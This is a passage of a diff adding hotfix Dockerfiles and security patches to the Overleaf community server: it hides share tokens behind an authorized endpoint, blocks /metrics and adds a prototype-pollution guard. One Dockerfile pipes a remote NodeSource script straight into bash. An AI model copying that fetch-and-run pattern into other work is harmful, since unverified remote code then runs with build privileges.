invites, +- tokens: project.tokens, + imageName: + project.imageName != null + ? Path.basename(project.imageName) +--- services/web/app/src/Features/TokenAccess/TokenAccessHandler.js ++++ services/web/app/src/Features/TokenAccess/TokenAccessHandler.js +@@ -246,22 +246,6 @@ const TokenAccessHandler = { + }) + }, + +- protectTokens(project, privilegeLevel) { +- if (!project || !project.tokens) { +- return +- } +- if (privilegeLevel === PrivilegeLevels.OWNER) { +- return +- } +- if (privilegeLevel !== PrivilegeLevels.READ_AND_WRITE) { +- project.tokens.readAndWrite = '' +- project.tokens.readAndWritePrefix = '' +- } +- if (privilegeLevel !== PrivilegeLevels.READ_ONLY) { +- project.tokens.readOnly = '' +- } +- }, +- + getV1DocPublishedInfo(token, callback) { + // default to allowing access + if (!Settings.apis.v1 || !Settings.apis.v1.url) { +@@ -304,7 +288,6 @@ TokenAccessHandler.promises = promisifyAll(TokenAccessHandler, { + '_projectFindOne', + 'grantSessionTokenAccess', + 'getRequestToken', +- 'protectTokens', + ], + multiResult: { + validateTokenForAnonymousAccess: ['isValidReadAndWrite', 'isValidReadOnly'], +--- services/web/frontend/js/features/share-project-modal/components/link-sharing.js ++++ services/web/frontend/js/features/share-project-modal/components/link-sharing.js +@@ -1,4 +1,4 @@ +-import { useCallback, useState } from 'react' ++import { useCallback, useState, useEffect } from 'react' + import PropTypes from 'prop-types' + import { Button, Col, Row } from 'react-bootstrap' + import { Trans } from 'react-i18next' +@@ -10,6 +10,8 @@ import CopyLink from '../../../shared/components/copy-link' + import { useProjectContext } from '../../../shared/context/project-context' + import * as eventTracking from '../../../infrastructure/event-tracking' + import { useUserContext } from '../../../shared/context/user-context' ++import { getJSON } from '../../../infrastructure/fetch-json' ++import useAbortController from '../../../shared/hooks/use-abort-controller' + + export default function LinkSharing({ canAddCollaborators }) { + const [inflight, setInflight] = useState(false) +@@ -27,8 +29,7 @@ export default function LinkSharing({ canAddCollaborators }) { + ) + .then(() => { + // NOTE: not calling `updateProject` here as it receives data via +- // project:publicAccessLevel:changed and project:tokens:changed +- // over the websocket connection ++ // project:publicAccessLevel:changed over the websocket connection + // TODO: eventTracking.sendMB('project-make-token-based') when newPublicAccessLevel is 'tokenBased' + }) + .finally(() => { +@@ -106,7 +107,17 @@ PrivateSharing.propTypes = { + } + + function TokenBasedSharing({ setAccessLevel, inflight, canAddCollaborators }) { +- const { tokens } = useProjectContext() ++ const { _id: projectId } = useProjectContext() ++ ++ const [tokens, setTokens] = useState(null) ++ ++ const { signal } = useAbortController() ++ ++ useEffect(() => { ++ getJSON(`/project/${projectId}/tokens`, { signal }) ++ .then(data => setTokens(data)) ++ .catch(error => console.error(error)) ++ }, [projectId, signal]) + + return ( + +@@ -194,7 +205,17 @@ LegacySharing.propTypes = { + } + + export function ReadOnlyTokenLink() { +- const { tokens } = useProjectContext() ++ const { _id: projectId } = useProjectContext() ++ ++ const [tokens, setTokens] = useState(null) ++ ++ const { signal } = useAbortController() ++ ++ useEffect(() => { ++ getJSON(`/project/${projectId}/tokens`, { signal }) ++ .then(data => setTokens(data)) ++ .catch(error => console.error(error)) ++ }, [projectId, signal]) + + return ( + +--- services/web/frontend/js/features/share-project-modal/controllers/react-share-project-modal-controller.js ++++ services/web/frontend/js/features/share-project-modal/controllers/react-share-project-modal-controller.js +@@ -31,16 +31,6 @@ export default App.controller( + }) + } + +- /* tokens */ +- +- ide.socket.on('project:tokens:changed', data => { +- if (data.tokens != null) { +- $scope.$applyAsync(() => { +- $scope.project.tokens = data.tokens +- }) +- } +- }) +- + ide.socket.on('project:membership:changed', data => { + if (data.members) { + listProjectMembers($scope.project._id) +--- services/web/frontend/js/shared/context/mock/mock-ide.js ++++ services/web/frontend/js/shared/context/mock/mock-ide.js +@@ -27,10 +27,6 @@ export const getMockIde = () => { + zotero: false, + }, + publicAccessLevel: '', +- tokens: { +- readOnly: '', +- readAndWrite: '', +- }, + owner: { + _id: '', + email: '', +--- services/web/frontend/js/shared/context/project-context.js ++++ services/web/frontend/js/shared/context/project-context.js +@@ -28,10 +28,6 @@ export const projectShape = { + versioning: PropTypes.bool, + }), + publicAccessLevel: PropTypes.string, +- tokens: PropTypes.shape({ +- readOnly: PropTypes.string, +- readAndWrite: PropTypes.string, +- }), + owner: PropTypes.shape({ + _id: PropTypes.string.isRequired, + email: PropTypes.string.isRequired, +@@ -81,7 +77,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccesLevel: publicAccessLevel, +- tokens, + owner, + } = project || projectFallback + +@@ -94,7 +89,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccessLevel, +- tokens, + owner, + } + }, [ +@@ -105,7 +99,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccessLevel, +- tokens, + owner, + ]) diff --git a/server-ce/hotfix/4.0.1/Dockerfile b/server-ce/hotfix/4.0.1/Dockerfile new file mode 100644 index 0000000..95d0536 --- /dev/null +++ b/server-ce/hotfix/4.0.1/Dockerfile @@ -0,0 +1,9 @@ +FROM sharelatex/sharelatex:4.0.0 + +# Patch: Block access to metrics endpoint +COPY pr_13229_ce_only.patch . +RUN patch -p0 --directory=/ < pr_13229_ce_only.patch + +# Patch: Remove documentation link from editor outline +COPY outline_doc_icon.patch . +RUN patch -p0 < outline_doc_icon.patch diff --git a/server-ce/hotfix/4.0.1/outline_doc_icon.patch b/server-ce/hotfix/4.0.1/outline_doc_icon.patch new file mode 100644 index 0000000..847cfde --- /dev/null +++ b/server-ce/hotfix/4.0.1/outline_doc_icon.patch @@ -0,0 +1,9 @@ +--- services/web/app/views/project/editor/file-tree-react.pug ++++ services/web/app/views/project/editor/file-tree-react.pug +@@ -38,5 +38,3 @@ aside.editor-sidebar.full-size + highlighted-line="highlightedLine" + show="show" + ) +- +- documentation-button +\ No newline at end of file diff --git a/server-ce/hotfix/4.0.1/pr_13229_ce_only.patch b/server-ce/hotfix/4.0.1/pr_13229_ce_only.patch new file mode 100644 index 0000000..9bb134f --- /dev/null +++ b/server-ce/hotfix/4.0.1/pr_13229_ce_only.patch @@ -0,0 +1,14 @@ +--- etc/nginx/sites-enabled/sharelatex.conf ++++ etc/nginx/sites-enabled/sharelatex.conf +@@ -4,6 +4,11 @@ server { + + root /overleaf/services/web/public/; + ++ # block external access to prometheus /metrics ++ location /metrics { ++ internal; ++ } ++ + location / { + proxy_pass http://127.0.0.1:3000; + proxy_http_version 1.1; diff --git a/server-ce/hotfix/4.0.3/Dockerfile b/server-ce/hotfix/4.0.3/Dockerfile new file mode 100644 index 0000000..02199b7 --- /dev/null +++ b/server-ce/hotfix/4.0.3/Dockerfile @@ -0,0 +1,7 @@ +# 4.0.1 was tagged as 4.0.2 in dockerhub to keep parity with Server Pro +FROM sharelatex/sharelatex:4.0.1 + + +# Patch: fixes anonymous edits breaking history +COPY pr_13574.patch . +RUN patch -p0 < pr_13574.patch diff --git a/server-ce/hotfix/4.0.3/pr_13574.patch b/server-ce/hotfix/4.0.3/pr_13574.patch new file mode 100644 index 0000000..6d50715 --- /dev/null +++ b/server-ce/hotfix/4.0.3/pr_13574.patch @@ -0,0 +1,22 @@ +--- services/project-history/app/js/UpdateTranslator.js ++++ services/project-history/app/js/UpdateTranslator.js +@@ -73,9 +73,18 @@ function _convertToChange(projectId, updateWithBlob) { + throw error + } + ++ let v2Authors ++ if (update.meta.user_id === 'anonymous-user') { ++ // history-v1 uses null to represent an anonymous author ++ v2Authors = [null] ++ } else { ++ // user_id is missing on resync operations that update the contents of a doc ++ v2Authors = _.compact([update.meta.user_id]) ++ } ++ + const rawChange = { + operations, +- v2Authors: _.compact([update.meta.user_id]), ++ v2Authors, + timestamp: new Date(update.meta.ts).toISOString(), + projectVersion, + v2DocVersions: Object.keys(v2DocVersions).length ? v2DocVersions : null, diff --git a/server-ce/hotfix/4.0.4/Dockerfile b/server-ce/hotfix/4.0.4/Dockerfile new file mode 100644 index 0000000..a1d86ae --- /dev/null +++ b/server-ce/hotfix/4.0.4/Dockerfile @@ -0,0 +1,10 @@ +FROM sharelatex/sharelatex:4.0.3 + +# Node update +RUN curl -sSL https://deb.nodesource.com/setup_16.x | bash - \ + && apt-get install -y nodejs + +# Patch: fetch access tokens via endpoint +COPY pr_13485.patch . +RUN patch -p0 < pr_13485.patch +RUN node genScript compile | bash diff --git a/server-ce/hotfix/4.0.4/pr_13485.patch b/server-ce/hotfix/4.0.4/pr_13485.patch new file mode 100644 index 0000000..14dc931 --- /dev/null +++ b/server-ce/hotfix/4.0.4/pr_13485.patch @@ -0,0 +1,389 @@ +--- services/web/app/src/Features/Collaborators/CollaboratorsController.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsController.js +@@ -11,6 +11,7 @@ const Errors = require('../Errors/Errors') + const logger = require('@overleaf/logger') + const { expressify } = require('../../util/promises') + const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper') ++const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') + + module.exports = { + removeUserFromProject: expressify(removeUserFromProject), +@@ -18,6 +19,7 @@ module.exports = { + getAllMembers: expressify(getAllMembers), + setCollaboratorInfo: expressify(setCollaboratorInfo), + transferOwnership: expressify(transferOwnership), ++ getShareTokens: expressify(getShareTokens), + } + + async function removeUserFromProject(req, res, next) { +@@ -114,3 +116,37 @@ async function _removeUserIdFromProject(projectId, userId) { + ) + await TagsHandler.promises.removeProjectFromAllTags(userId, projectId) + } ++ ++async function getShareTokens(req, res) { ++ const projectId = req.params.Project_id ++ const userId = SessionManager.getLoggedInUserId(req.session) ++ ++ let tokens ++ if (userId) { ++ tokens = await CollaboratorsGetter.promises.getPublicShareTokens( ++ ObjectId(userId), ++ ObjectId(projectId) ++ ) ++ } else { ++ // anonymous access, the token is already available in the session ++ const readOnly = TokenAccessHandler.getRequestToken(req, projectId) ++ tokens = { readOnly } ++ } ++ if (!tokens) { ++ return res.sendStatus(403) ++ } ++ ++ if (tokens.readOnly || tokens.readAndWrite) { ++ logger.info( ++ { ++ projectId, ++ userId: userId || 'anonymous', ++ ip: req.ip, ++ tokens: Object.keys(tokens), ++ }, ++ 'project tokens accessed' ++ ) ++ } ++ ++ res.json(tokens) ++} +--- services/web/app/src/Features/Collaborators/CollaboratorsGetter.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsGetter.js +@@ -25,6 +25,7 @@ module.exports = { + getInvitedCollaboratorCount: callbackify(getInvitedCollaboratorCount), + getProjectsUserIsMemberOf: callbackify(getProjectsUserIsMemberOf), + isUserInvitedMemberOfProject: callbackify(isUserInvitedMemberOfProject), ++ getPublicShareTokens: callbackify(getPublicShareTokens), + userIsTokenMember: callbackify(userIsTokenMember), + getAllInvitedMembers: callbackify(getAllInvitedMembers), + promises: { +@@ -37,6 +38,7 @@ module.exports = { + getInvitedCollaboratorCount, + getProjectsUserIsMemberOf, + isUserInvitedMemberOfProject, ++ getPublicShareTokens, + userIsTokenMember, + getAllInvitedMembers, + }, +@@ -133,6 +135,40 @@ async function isUserInvitedMemberOfProject(userId, projectId) { + return false + } + ++async function getPublicShareTokens(userId, projectId) { ++ const memberInfo = await Project.findOne( ++ { ++ _id: projectId, ++ }, ++ { ++ isOwner: { $eq: ['$owner_ref', userId] }, ++ hasTokenReadOnlyAccess: { ++ $and: [ ++ { $in: [userId, '$tokenAccessReadOnly_refs'] }, ++ { $eq: ['$publicAccesLevel', PublicAccessLevels.TOKEN_BASED] }, ++ ], ++ }, ++ tokens: 1, ++ } ++ ) ++ .lean() ++ .exec() ++ ++ if (!memberInfo) { ++ return null ++ } ++ ++ if (memberInfo.isOwner) { ++ return memberInfo.tokens ++ } else if (memberInfo.hasTokenReadOnlyAccess) { ++ return { ++ readOnly: memberInfo.tokens.readOnly, ++ } ++ } else { ++ return {} ++ } ++} ++ + async function getProjectsUserIsMemberOf(userId, fields) { + const limit = pLimit(2) + const [readAndWrite, readOnly, tokenReadAndWrite, tokenReadOnly] = +--- services/web/app/src/Features/Collaborators/CollaboratorsRouter.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsRouter.js +@@ -22,6 +22,10 @@ const rateLimiters = { + points: 200, + duration: 60 * 10, + }), ++ getProjectTokens: new RateLimiter('get-project-tokens', { ++ points: 200, ++ duration: 60 * 10, ++ }), + } + + module.exports = { +@@ -139,5 +143,12 @@ module.exports = { + CollaboratorsInviteController.acceptInvite, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) ++ ++ webRouter.get( ++ '/project/:Project_id/tokens', ++ RateLimiterMiddleware.rateLimit(rateLimiters.getProjectTokens), ++ AuthorizationMiddleware.ensureUserCanReadProject, ++ CollaboratorsController.getShareTokens ++ ) + }, + } +--- services/web/app/src/Features/Editor/EditorController.js ++++ services/web/app/src/Features/Editor/EditorController.js +@@ -581,20 +581,7 @@ const EditorController = { + { newAccessLevel } + ) + if (newAccessLevel === PublicAccessLevels.TOKEN_BASED) { +- ProjectDetailsHandler.ensureTokensArePresent( +- projectId, +- function (err, tokens) { +- if (err) { +- return callback(err) +- } +- EditorRealTimeController.emitToRoom( +- projectId, +- 'project:tokens:changed', +- { tokens } +- ) +- callback() +- } +- ) ++ ProjectDetailsHandler.ensureTokensArePresent(projectId, callback) + } else { + callback() + } +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -67,8 +67,6 @@ async function joinProject(req, res, next) { + if (!project) { + return res.sendStatus(403) + } +- // Hide access tokens if this is not the project owner +- TokenAccessHandler.protectTokens(project, privilegeLevel) + // Hide sensitive data if the user is restricted + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } +--- services/web/app/src/Features/Project/ProjectController.js ++++ services/web/app/src/Features/Project/ProjectController.js +@@ -343,7 +343,7 @@ const ProjectController = { + const userId = SessionManager.getLoggedInUserId(req.session) + ProjectGetter.findAllUsersProjects( + userId, +- 'name lastUpdated publicAccesLevel archived trashed owner_ref tokens', ++ 'name lastUpdated publicAccesLevel archived trashed owner_ref', + (err, projects) => { + if (err != null) { + return next(err) +@@ -1072,7 +1072,6 @@ const ProjectController = { + // If a project is simultaneously trashed and archived, we will consider it archived but not trashed. + const trashed = ProjectHelper.isTrashed(project, userId) && !archived + +- TokenAccessHandler.protectTokens(project, accessLevel) + const model = { + id: project._id, + name: project.name, +--- services/web/app/src/Features/Project/ProjectDetailsHandler.js ++++ services/web/app/src/Features/Project/ProjectDetailsHandler.js +@@ -207,14 +207,13 @@ async function ensureTokensArePresent(projectId) { + project.tokens.readOnly != null && + project.tokens.readAndWrite != null + ) { +- return project.tokens ++ return + } + await _generateTokens(project) + await Project.updateOne( + { _id: projectId }, + { $set: { tokens: project.tokens } } + ).exec() +- return project.tokens + } + + async function clearTokens(projectId) { +--- services/web/app/src/Features/Project/ProjectEditorHandler.js ++++ services/web/app/src/Features/Project/ProjectEditorHandler.js +@@ -49,7 +49,6 @@ module.exports = ProjectEditorHandler = { + ), + members: [], + invites, +- tokens: project.tokens, + imageName: + project.imageName != null + ? Path.basename(project.imageName) +--- services/web/app/src/Features/TokenAccess/TokenAccessHandler.js ++++ services/web/app/src/Features/TokenAccess/TokenAccessHandler.js +@@ -246,22 +246,6 @@ const TokenAccessHandler = { + }) + }, + +- protectTokens(project, privilegeLevel) { +- if (!project || !project.tokens) { +- return +- } +- if (privilegeLevel === PrivilegeLevels.OWNER) { +- return +- } +- if (privilegeLevel !== PrivilegeLevels.READ_AND_WRITE) { +- project.tokens.readAndWrite = '' +- project.tokens.readAndWritePrefix = '' +- } +- if (privilegeLevel !== PrivilegeLevels.READ_ONLY) { +- project.tokens.readOnly = '' +- } +- }, +- + getV1DocPublishedInfo(token, callback) { + // default to allowing access + if (!Settings.apis.v1 || !Settings.apis.v1.url) { +@@ -304,7 +288,6 @@ TokenAccessHandler.promises = promisifyAll(TokenAccessHandler, { + '_projectFindOne', + 'grantSessionTokenAccess', + 'getRequestToken', +- 'protectTokens', + ], + multiResult: { + validateTokenForAnonymousAccess: ['isValidReadAndWrite', 'isValidReadOnly'], +--- services/web/frontend/js/features/share-project-modal/components/link-sharing.js ++++ services/web/frontend/js/features/share-project-modal/components/link-sharing.js +@@ -1,4 +1,4 @@ +-import { useCallback, useState } from 'react' ++import { useCallback, useState, useEffect } from 'react' + import PropTypes from 'prop-types' + import { Button, Col, Row } from 'react-bootstrap' + import { Trans } from 'react-i18next' +@@ -10,6 +10,8 @@ import CopyLink from '../../../shared/components/copy-link' + import { useProjectContext } from '../../../shared/context/project-context' + import * as eventTracking from '../../../infrastructure/event-tracking' + import { useUserContext } from '../../../shared/context/user-context' ++import { getJSON } from '../../../infrastructure/fetch-json' ++import useAbortController from '../../../shared/hooks/use-abort-controller' + + export default function LinkSharing({ canAddCollaborators }) { + const [inflight, setInflight] = useState(false) +@@ -27,8 +29,7 @@ export default function LinkSharing({ canAddCollaborators }) { + ) + .then(() => { + // NOTE: not calling `updateProject` here as it receives data via +- // project:publicAccessLevel:changed and project:tokens:changed +- // over the websocket connection ++ // project:publicAccessLevel:changed over the websocket connection + // TODO: eventTracking.sendMB('project-make-token-based') when newPublicAccessLevel is 'tokenBased' + }) + .finally(() => { +@@ -106,7 +107,17 @@ PrivateSharing.propTypes = { + } + + function TokenBasedSharing({ setAccessLevel, inflight, canAddCollaborators }) { +- const { tokens } = useProjectContext() ++ const { _id: projectId } = useProjectContext() ++ ++ const [tokens, setTokens] = useState(null) ++ ++ const { signal } = useAbortController() ++ ++ useEffect(() => { ++ getJSON(`/project/${projectId}/tokens`, { signal }) ++ .then(data => setTokens(data)) ++ .catch(error => console.error(error)) ++ }, [projectId, signal]) + + return ( + +@@ -194,7 +205,17 @@ LegacySharing.propTypes = { + } + + export function ReadOnlyTokenLink() { +- const { tokens } = useProjectContext() ++ const { _id: projectId } = useProjectContext() ++ ++ const [tokens, setTokens] = useState(null) ++ ++ const { signal } = useAbortController() ++ ++ useEffect(() => { ++ getJSON(`/project/${projectId}/tokens`, { signal }) ++ .then(data => setTokens(data)) ++ .catch(error => console.error(error)) ++ }, [projectId, signal]) + + return ( + +--- services/web/frontend/js/features/share-project-modal/controllers/react-share-project-modal-controller.js ++++ services/web/frontend/js/features/share-project-modal/controllers/react-share-project-modal-controller.js +@@ -31,16 +31,6 @@ export default App.controller( + }) + } + +- /* tokens */ +- +- ide.socket.on('project:tokens:changed', data => { +- if (data.tokens != null) { +- $scope.$applyAsync(() => { +- $scope.project.tokens = data.tokens +- }) +- } +- }) +- + ide.socket.on('project:membership:changed', data => { + if (data.members) { + listProjectMembers($scope.project._id) +--- services/web/frontend/js/shared/context/mock/mock-ide.js ++++ services/web/frontend/js/shared/context/mock/mock-ide.js +@@ -27,10 +27,6 @@ export const getMockIde = () => { + zotero: false, + }, + publicAccessLevel: '', +- tokens: { +- readOnly: '', +- readAndWrite: '', +- }, + owner: { + _id: '', + email: '', +--- services/web/frontend/js/shared/context/project-context.js ++++ services/web/frontend/js/shared/context/project-context.js +@@ -28,10 +28,6 @@ export const projectShape = { + versioning: PropTypes.bool, + }), + publicAccessLevel: PropTypes.string, +- tokens: PropTypes.shape({ +- readOnly: PropTypes.string, +- readAndWrite: PropTypes.string, +- }), + owner: PropTypes.shape({ + _id: PropTypes.string.isRequired, + email: PropTypes.string.isRequired, +@@ -81,7 +77,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccesLevel: publicAccessLevel, +- tokens, + owner, + } = project || projectFallback + +@@ -94,7 +89,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccessLevel, +- tokens, + owner, + } + }, [ +@@ -105,7 +99,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccessLevel, +- tokens, + owner, + ]) diff --git a/server-ce/hotfix/4.0.5/Dockerfile b/server-ce/hotfix/4.0.5/Dockerfile new file mode 100644 index 0000000..f62bd56 --- /dev/null +++ b/server-ce/hotfix/4.0.5/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:4.0.4 + +# Patch: clear invite and invite tokens through the websocket +COPY pr_13427.patch . +RUN patch -p0 < pr_13427.patch + +# Patch: https://github.com/Automattic/mongoose/commit/f1efabf350522257364aa5c2cb36e441cf08f1a2 +COPY mongoose_proto.patch . +RUN patch -p0 < mongoose_proto.patch + +# Patch: Allow digits in PDF filenames +COPY pr_13122.patch . +RUN patch -p0 < pr_13122.patch diff --git a/server-ce/hotfix/4.0.5/mongoose_proto.patch b/server-ce/hotfix/4.0.5/mongoose_proto.patch new file mode 100644 index 0000000..d519ad9 --- /dev/null +++ b/server-ce/hotfix/4.0.5/mongoose_proto.patch @@ -0,0 +1,12 @@ +--- services/web/node_modules/mongoose/lib/document.js ++++ services/web/node_modules/mongoose/lib/document.js +@@ -739,6 +739,10 @@ function init(self, obj, doc, opts, prefix) { + + function _init(index) { + i = keys[index]; ++ // avoid prototype pollution ++ if (i === '__proto__' || i === 'constructor') { ++ return; ++ } + path = prefix + i; + schemaType = docSchema.path(path); diff --git a/server-ce/hotfix/4.0.5/pr_13122.patch b/server-ce/hotfix/4.0.5/pr_13122.patch new file mode 100644 index 0000000..3a1a5ff --- /dev/null +++ b/server-ce/hotfix/4.0.5/pr_13122.patch @@ -0,0 +1,11 @@ +--- services/web/app/src/Features/Compile/CompileController.js ++++ services/web/app/src/Features/Compile/CompileController.js +@@ -371,7 +371,7 @@ module.exports = CompileController = { + }, + + _getSafeProjectName(project) { +- return project.name.replace(/\P{L}/gu, '_') ++ return project.name.replace(/[^\p{L}\p{Nd}]/gu, '_') + }, + + deleteAuxFiles(req, res, next) { diff --git a/server-ce/hotfix/4.0.5/pr_13427.patch b/server-ce/hotfix/4.0.5/pr_13427.patch new file mode 100644 index 0000000..716b7ce --- /dev/null +++ b/server-ce/hotfix/4.0.5/pr_13427.patch @@ -0,0 +1,92 @@ +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -73,6 +73,7 @@ async function joinProject(req, res, next) { + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } + project.members = [] ++ project.invites = [] + } + // Only show the 'renamed or deleted' message once + if (project.deletedByExternalDataSource) { +--- services/web/app/src/Features/Project/ProjectEditorHandler.js ++++ services/web/app/src/Features/Project/ProjectEditorHandler.js +@@ -48,19 +48,13 @@ + deletedDocsFromDocstore + ), + members: [], +- invites, ++ invites: this.buildInvitesView(invites), + imageName: + project.imageName != null + ? Path.basename(project.imageName) + : undefined, + } + +- if (result.invites == null) { +- result.invites = [] +- } +- result.invites.forEach(invite => { +- delete invite.token +- }) + ;({ owner, ownerFeatures, members } = + this.buildOwnerAndMembersViews(members)) + result.owner = owner +@@ -99,7 +93,7 @@ + let owner = null + let ownerFeatures = null + const filteredMembers = [] +- for (const member of Array.from(members || [])) { ++ for (const member of members || []) { + if (member.privilegeLevel === 'owner') { + ownerFeatures = member.user.features + owner = this.buildUserModelView(member.user, 'owner') +@@ -128,24 +122,15 @@ + }, + + buildFolderModelView(folder) { +- let file + const fileRefs = _.filter(folder.fileRefs || [], file => file != null) + return { + _id: folder._id, + name: folder.name, +- folders: Array.from(folder.folders || []).map(childFolder => ++ folders: (folder.folders || []).map(childFolder => + this.buildFolderModelView(childFolder) + ), +- fileRefs: (() => { +- const result = [] +- for (file of Array.from(fileRefs)) { +- result.push(this.buildFileModelView(file)) +- } +- return result +- })(), +- docs: Array.from(folder.docs || []).map(doc => +- this.buildDocModelView(doc) +- ), ++ fileRefs: fileRefs.map(file => this.buildFileModelView(file)), ++ docs: (folder.docs || []).map(doc => this.buildDocModelView(doc)), + } + }, + +@@ -164,4 +149,21 @@ + name: doc.name, + } + }, ++ ++ buildInvitesView(invites) { ++ if (invites == null) { ++ return [] ++ } ++ return invites.map(invite => ++ _.pick(invite, [ ++ '_id', ++ 'createdAt', ++ 'email', ++ 'expires', ++ 'privileges', ++ 'projectId', ++ 'sendingUserId', ++ ]) ++ ) ++ }, + } diff --git a/server-ce/hotfix/4.0.6/Dockerfile b/server-ce/hotfix/4.0.6/Dockerfile new file mode 100644 index 0000000..dcd5c6d --- /dev/null +++ b/server-ce/hotfix/4.0.6/Dockerfile @@ -0,0 +1,4 @@ +FROM sharelatex/sharelatex:4.0.5 + +# Patch: Drop the old history collections and increase mongo query timeout +ADD clean_sl_history_data.js /overleaf/services/web/scripts/history/clean_sl_history_data.js diff --git a/server-ce/hotfix/4.0.6/clean_sl_history_data.js b/server-ce/hotfix/4.0.6/clean_sl_history_data.js new file mode 100644 index 0000000..a7497c8 --- /dev/null +++ b/server-ce/hotfix/4.0.6/clean_sl_history_data.js @@ -0,0 +1,70 @@ +// Increase default mongo query timeout from 1min to 1h +process.env.MONGO_SOCKET_TIMEOUT = process.env.MONGO_SOCKET_TIMEOUT || '360000' +const { waitForDb, db } = require('../../app/src/infrastructure/mongodb') + +async function main() { + await checkAllProjectsAreMigrated() + await setAllowDowngradeToFalse() + await deleteHistoryCollections() + console.log('Legacy history data cleaned up successfully') + process.exit(0) +} + +async function checkAllProjectsAreMigrated() { + console.log('checking all projects are migrated to Full Project History') + + const count = await db.projects.countDocuments({ + 'overleaf.history.display': { $ne: true }, + }) + + if (count === 0) { + console.log('All projects are migrated to Full Project History') + } else { + console.error( + `There are ${count} projects that are not migrated to Full Project History` + + ` please complete the migration before running this script again.` + ) + process.exit(1) + } +} + +async function setAllowDowngradeToFalse() { + console.log('unsetting `allowDowngrade` flag in all projects') + await db.projects.updateMany( + { + 'overleaf.history.id': { $exists: true }, + 'overleaf.history.allowDowngrade': true, + }, + { $unset: { 'overleaf.history.allowDowngrade': 1 } } + ) + console.log('unsetting `allowDowngrade` flag in all projects - Done') +} + +async function deleteHistoryCollections() { + await gracefullyDropCollection(db.docHistory) + await gracefullyDropCollection(db.docHistoryIndex) + await gracefullyDropCollection(db.projectHistoryMetaData) +} + +async function gracefullyDropCollection(collection) { + const collectionName = collection.collectionName + console.log(`removing \`${collectionName}\` data`) + try { + await collection.drop() + } catch (err) { + if (err.code === 26) { + // collection already deleted + console.log(`removing \`${collectionName}\` data - Already removed`) + } else { + throw err + } + } + console.log(`removing \`${collectionName}\` data - Done`) +} + +waitForDb() + .then(main) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/server-ce/hotfix/4.1.1/Dockerfile b/server-ce/hotfix/4.1.1/Dockerfile new file mode 100644 index 0000000..55fc5b5 --- /dev/null +++ b/server-ce/hotfix/4.1.1/Dockerfile @@ -0,0 +1 @@ +FROM sharelatex/sharelatex:4.1.0 diff --git a/server-ce/hotfix/4.1.2/Dockerfile b/server-ce/hotfix/4.1.2/Dockerfile new file mode 100644 index 0000000..6669ec0 --- /dev/null +++ b/server-ce/hotfix/4.1.2/Dockerfile @@ -0,0 +1 @@ +FROM sharelatex/sharelatex:4.1.1 diff --git a/server-ce/hotfix/4.1.3/Dockerfile b/server-ce/hotfix/4.1.3/Dockerfile new file mode 100644 index 0000000..ed1c9ff --- /dev/null +++ b/server-ce/hotfix/4.1.3/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:4.1.2 + +# Patch: fix soft history retry in cron job +COPY history_soft_retry.patch . +RUN patch -p0 < history_soft_retry.patch diff --git a/server-ce/hotfix/4.1.3/history_soft_retry.patch b/server-ce/hotfix/4.1.3/history_soft_retry.patch new file mode 100644 index 0000000..a28855f --- /dev/null +++ b/server-ce/hotfix/4.1.3/history_soft_retry.patch @@ -0,0 +1,8 @@ +--- cron/project-history-retry-soft.sh ++++ cron/project-history-retry-soft.sh +@@ -8,4 +8,4 @@ echo "-----------------------------------" + + PROJECT_HISTORY_URL='http://localhost:3054' + +-curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" ++curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/hotfix/4.1.4/Dockerfile b/server-ce/hotfix/4.1.4/Dockerfile new file mode 100644 index 0000000..e7120b9 --- /dev/null +++ b/server-ce/hotfix/4.1.4/Dockerfile @@ -0,0 +1,9 @@ +FROM sharelatex/sharelatex:4.1.3 + +# Patch: Make history-v1 http request timeout configurable +COPY pr_15409.patch / +RUN cd / && patch -p0 < pr_15409.patch + +# Patch: Add verbose logging for I/O in history-v1 +COPY pr_15410.patch . +RUN patch -p0 < pr_15410.patch diff --git a/server-ce/hotfix/4.1.4/pr_15409.patch b/server-ce/hotfix/4.1.4/pr_15409.patch new file mode 100644 index 0000000..865ec3f --- /dev/null +++ b/server-ce/hotfix/4.1.4/pr_15409.patch @@ -0,0 +1,90 @@ +--- overleaf/services/history-v1/config/custom-environment-variables.json ++++ overleaf/services/history-v1/config/custom-environment-variables.json +@@ -43,5 +43,6 @@ + }, + "clusterWorkers": "CLUSTER_WORKERS", + "maxFileUploadSize": "MAX_FILE_UPLOAD_SIZE", +- "httpsOnly": "HTTPS_ONLY" ++ "httpsOnly": "HTTPS_ONLY", ++ "httpRequestTimeout": "SHARELATEX_HISTORY_V1_HTTP_REQUEST_TIMEOUT" + } +--- etc/sharelatex/settings.js ++++ etc/sharelatex/settings.js +@@ -261,6 +261,10 @@ const settings = { + url: process.env.V1_HISTORY_URL || 'http://localhost:3100/api', + user: 'staging', + pass: process.env.STAGING_PASSWORD, ++ requestTimeout: parseInt( ++ process.env.SHARELATEX_HISTORY_V1_HTTP_REQUEST_TIMEOUT || '300000', // default is 5min ++ 10 ++ ), + }, + }, + references: {}, +diff --git a/services/history-v1/app.js b/services/history-v1/app.js +index 6b3a2ba8f89..2ad490fb6b6 100644 +--- overleaf/services/history-v1/app.js ++++ overleaf/services/history-v1/app.js +@@ -5,6 +5,7 @@ + // Metrics must be initialized before importing anything else + require('@overleaf/metrics/initialize') + ++const config = require('config') + const Events = 